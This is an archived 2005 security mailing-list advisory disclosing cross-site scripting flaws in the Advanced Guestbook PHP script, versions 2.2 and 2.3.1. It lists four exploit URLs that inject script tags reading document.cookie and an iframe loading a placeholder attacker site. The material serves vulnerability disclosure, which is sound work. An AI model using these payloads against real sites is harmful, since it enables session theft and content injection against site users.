lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <200512252252.07098.handrix@morx.org> Date: Sun Dec 25 21:58:09 2005 From: handrix at morx.org (handrix@...x.org) Subject: Advanced Guestbook remote XSS exploit Advanced Guestbook 2.2 and 2.3.1 and possibly other versions remote XSS vulnerabilities By: Handrix <handrix_at_morx_org> 16 December 2005 MorX security research team www.morx.org Description: Advanced Guestbook is a PHP-based guestbook script. index.php and comment.php scripts are vulnerable to XSS attacks. This issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks. Exploit: http://www.example.com/guestbook/index.php?entry=<script>alert(document.cookie);</script> http://www.example.com/guestbook/index.php?entry=<iframe src=http://www.attackersite.com/> http://www.example.com/guestbook/comment.php?gb_id=1<script>alert(document.cookie);</script> http://www.example.com/guestbook/comment.php?gb_id=1<IFRAME SRC="javascript:alert('XSS');"></IFRAME> Vulnerable versions : Advanced Guestbook 2.2 Advanced Guestbook 2.3.1 ___________________________________________________________________________ Nouveau : téléphonez moins cher avec Yahoo! Messenger ! Découvez les tarifs exceptionnels pour appeler la France et l'international. Téléchargez sur http://fr.messenger.yahoo.com